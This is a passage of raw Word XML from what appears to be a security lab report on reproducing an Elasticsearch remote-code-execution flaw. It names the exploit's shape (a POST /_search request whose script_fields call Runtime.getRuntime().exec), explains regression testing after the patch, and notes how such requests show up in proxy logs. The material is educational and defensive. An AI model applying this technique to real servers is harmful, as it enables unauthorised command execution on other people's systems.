          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> A vulnerability is the flaw itself (Elasticsearch compiles and evaluates client-supplied scripts with full Java reflection and no authentication). An exploit is the concrete request that abuses it (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>POST /_search</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> with </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>script_fields</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> calling </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Runtime.getRuntime().exec</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>). In this work the vulnerability is the dangerous default in the product; the exploit is the curl request.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7.</w:t>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Why regression testing after a patch.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> A patch changes behaviour, and a security fix that disables the feature is not a fix. Here, a perfectly "secure" answer would be to block the whole service; the regression check (the same document is still searchable after the fix) proves the legitimate path still works.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40"/>
        <w:ind w:left="425" w:hanging="425"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>8.</w:t>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Why reproduce CVEs as a specialist.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> A pentester needs to know what a working exploit looks like in order to judge whether a target is really affected, and a SOC analyst needs the same knowledge to recognise the traffic in logs. Reproduction turns a CVE description into a concrete signature: a search request carrying </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>script_fields</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> is trivial to spot in a proxy log once you have seen it.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